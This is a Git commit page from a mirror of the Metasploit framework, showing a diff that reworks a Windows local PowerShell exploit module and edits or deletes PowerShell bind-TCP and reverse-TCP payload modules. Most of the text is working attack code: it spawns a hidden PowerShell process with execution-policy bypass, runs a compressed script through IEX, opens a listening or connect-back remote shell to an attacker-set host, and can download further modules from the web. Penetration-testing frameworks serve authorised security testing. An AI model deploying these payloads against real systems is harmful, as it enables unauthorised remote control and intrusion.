infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated payloads and fixed msftidy.

bug/bundler_fix
benpturner 2015-04-26 09:20:29 +01:00
parent ded904c72c
commit e6c61c461e
5 changed files with 12 additions and 218 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
modules/exploits/windows/local/interactive_powershell.rb
View File

@ -54,60 +54,22 @@ class Metasploit3 < Msf::Exploit::Local
payload = datastore['PAYLOAD']
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
vprint_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
# Check that the payload is a Windows one and on the list
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
return
end
pay = client.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
pay.datastore['RHOST'] = rhost
raw = pay.generate
raw = generate_payload.raw
res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
computer_name = session.sys.config.sysinfo['Computer']
vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
if datastore['LHOST'].to_s.empty?
if session.framework.payloads.keys.grep(/bind/).include?(datastore['PAYLOAD'])
print_status("Attemping to connect to #{rhost}:#{lport}...")
ctimeout = 10
stime = Time.now.to_i
last_error = nil
while stime + ctimeout > Time.now.to_i
Rex::ThreadSafe.sleep(2)
begin
client = Rex::Socket::Tcp.create(
'PeerHost' => rhost,
'PeerPort' => lport.to_i,
'Proxies' => datastore['Proxies'],
'Context' =>
{
'Msf' => framework,
'MsfPayload' => payload_instance,
'MsfExploit' => self
})
rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
last_error = e
end
if client
handler(client)
return
end
end
print_warning("If a shell is unsuccesful, ensure you have access to the target host and port.")
print_status("Try adding a route to the host: `route help`")
if last_error
raise last_error
else
fail_with(Failure::Unknown, "Unable to connect")
end
else
print_status("Waiting for connection from #{rhost}:#{lport}...")
end

10
modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
View File

@ -15,8 +15,8 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Name' => 'Windows Interactive Powershell Session, Bins TCP',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' =>
[
'Ben Turner', # benpturner
@ -47,6 +47,7 @@ module Metasploit3
def generate
lport = datastore['LPORT']
lhost = datastore['LHOST']
template_path = File.join(
Msf::Config.data_directory,
@ -62,14 +63,15 @@ module Metasploit3
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORTs_REPLACE', lport.to_s)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"

4
modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
View File

@ -15,7 +15,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
'Description' => 'Interacts with a powershell session on an established socket connection',
'Author' =>
[
@ -63,7 +63,7 @@ module Metasploit3
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"

84
modules/payloads/singles/windows/powershell_bind_tcp.rb
View File

@ -1,84 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
require 'msf/base/sessions/powershell'
###
#
# Extends the Exec payload to add a new user.
#
###
module Metasploit3
CachedSize = 1455
include Msf::Payload::Windows::Exec
include Rex::Powershell::Command
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Interactive Powershell Session, Bind TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::PowerShell,
))
# Register command execution options
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
lport = datastore['LPORT']
template_path = File.join(
Msf::Config.data_directory,
'exploits',
'powershell',
'powerfun.ps1')
script_in = File.read(template_path)
script_in << "\npowerfun -Command bind"
mods = ''
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
# Base64 encode the compressed file contents
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
end
end

86
modules/payloads/singles/windows/powershell_reverse_tcp.rb
View File

@ -1,86 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/payload/windows/exec'
require 'msf/base/sessions/powershell'
###
#
# Extends the Exec payload to add a new user.
#
###
module Metasploit3
CachedSize = 1439
include Msf::Payload::Windows::Exec
include Rex::Powershell::Command
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Interactive Powershell Session, Reverse TCP',
'Description' => 'Listen for a connection and spawn an interactive powershell session',
'Author' =>
[
'Ben Turner', # benpturner
'Dave Hardy' # davehardy20
],
'References' =>
[
['URL', 'https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::PowerShell,
))
# Register command execution options
register_options(
[
OptString.new('LOAD_MODULES', [ false, "A list of powershell modules seperated by a comma to download over the web", nil ]),
], self.class)
# Hide the CMD option...this is kinda ugly
deregister_options('CMD')
end
#
# Override the exec command string
#
def command_string
lport = datastore['LPORT']
lhost = datastore['LHOST']
template_path = File.join(
Msf::Config.data_directory,
'exploits',
'powershell',
'powerfun.ps1')
script_in = File.read(template_path)
script_in << "\npowerfun -Command reverse"
mods = ''
if datastore['LOAD_MODULES']
mods_array = datastore['LOAD_MODULES'].to_s.split(',')
mods_array.collect(&:strip)
print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
mods_array.each {|m| vprint_good " #{m}"}
mods = "\"#{mods_array.join("\",\n\"")}\""
script_in << " -Download true\n"
end
script_in.gsub!('MODULES_REPLACE', mods)
script_in.gsub!('LPORT_REPLACE', lport.to_s)
script_in.gsub!('LHOST_REPLACE', lhost.to_s)
# Base64 encode the compressed file contents
script = Rex::Powershell::Command.compress_script(script_in)
"powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
end
end